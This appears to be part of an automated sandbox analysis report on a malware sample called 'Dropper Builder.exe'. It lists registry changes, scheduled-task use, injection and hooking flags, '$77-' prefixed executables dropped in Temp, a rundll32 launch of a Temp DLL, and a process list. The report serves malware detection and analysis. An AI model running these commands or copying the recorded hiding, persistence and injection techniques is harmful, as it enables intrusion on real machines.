| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Videos" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "4" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Vid = "{0057D0E0-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133626137163497364" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Videos" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\IconSize = "96" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\LogicalViewMode = "3" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Downloads\Dropper Builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 5e00310000000000d658143010004e4557464f4c7e310000460009000400efbed6581430d65814302e000000cca90200000003000000000000000000000000000000aae21d004e0065007700200066006f006c00640065007200000018000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Videos" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} | C:\Windows\Explorer.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Dropper Builder.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION | C:\Windows\Explorer.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2780 -ip 2780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 448
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb10ceab58,0x7ffb10ceab68,0x7ffb10ceab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4132 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4444 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4252 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4688 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4908 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5112 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
